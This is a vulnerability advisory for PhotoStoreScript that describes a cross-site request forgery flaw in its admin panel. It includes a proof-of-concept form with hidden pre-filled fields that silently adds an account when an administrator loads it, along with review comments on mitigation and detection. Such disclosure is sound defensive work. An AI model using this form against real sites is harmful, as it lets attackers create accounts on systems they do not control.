< ------------------- header data start ------------------- >
#############################################################
# Application Name : PhotoStoreScript
# Vulnerable Type : XSRF (cross-site request forgery, CSRF)
# Infection : The admin password can be changed, or an admin account added, remotely and automatically
# Bug Fix Advice : A session key (session token) should be added to the form, or the old password should be required.
# author : Bug Researchers | CWOmer
############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!--
  Proof-of-concept form from the advisory, kept as published.

  What the markup shows: a multipart POST to the admin panel's
  structure_document_add.php, with the account fields pre-filled in hidden
  inputs. The form contains no anti-CSRF token field and no current-password
  field, so nothing in the request is bound to the administrator's session.
  NOTE(review): the server-side handler is not shown here; that it accepts
  the request on the strength of the session cookie alone is the advisory's
  claim and should be confirmed against the application.

  Mitigation: validate an unpredictable per-session token on the server for
  every state-changing admin request, set the SameSite attribute on the
  session cookie, reject POSTs whose Origin/Referer is not the admin host,
  and require re-authentication for account creation and password changes.

  Detection: review web logs for POSTs to this endpoint that carry a foreign
  or missing Origin/Referer, and audit the user table for accounts nobody
  remembers creating.
-->
<form method=post Enctype=multipart/form-data name=uploadform action=http://admin.photostorescript.com/admin/content/structure_document_add.php?id_parent=2&module_table=28&str=1>
<!-- Account fields: all hidden, all carrying fixed values chosen by the page author rather than typed by the administrator. -->
<input type=hidden name=login style=width:150 value=’CWOmer’ >
<input type=hidden name=name style=width:350 value=’CWOmer’ >
<input type=hidden name=lastname style=width:350 value=’CWOmer’ >
<input type=hidden name=email style=width:150 value=’deneme@deneme’ >
<input type=hidden name=telephone style=width:150 value=’CWOmer’ >
<input type=hidden name=country style=width:150 value=’CWOmer’ >
<input type=hidden name=city style=width:350 value=’CWOmer’ >
<input type=hidden name=zipcode style=width:350 value=’CWOmer’ >
<!-- Account type travels in the same request; the listing offers a single option, "buyer". -->
<select name=utype style=width:80 >
<option value=buyer >Buyer</option>
<!-- Only visible control in the form. -->
<input type=submit value=Add style=margin-top:10px>
</form>
< -- bug code end of -- >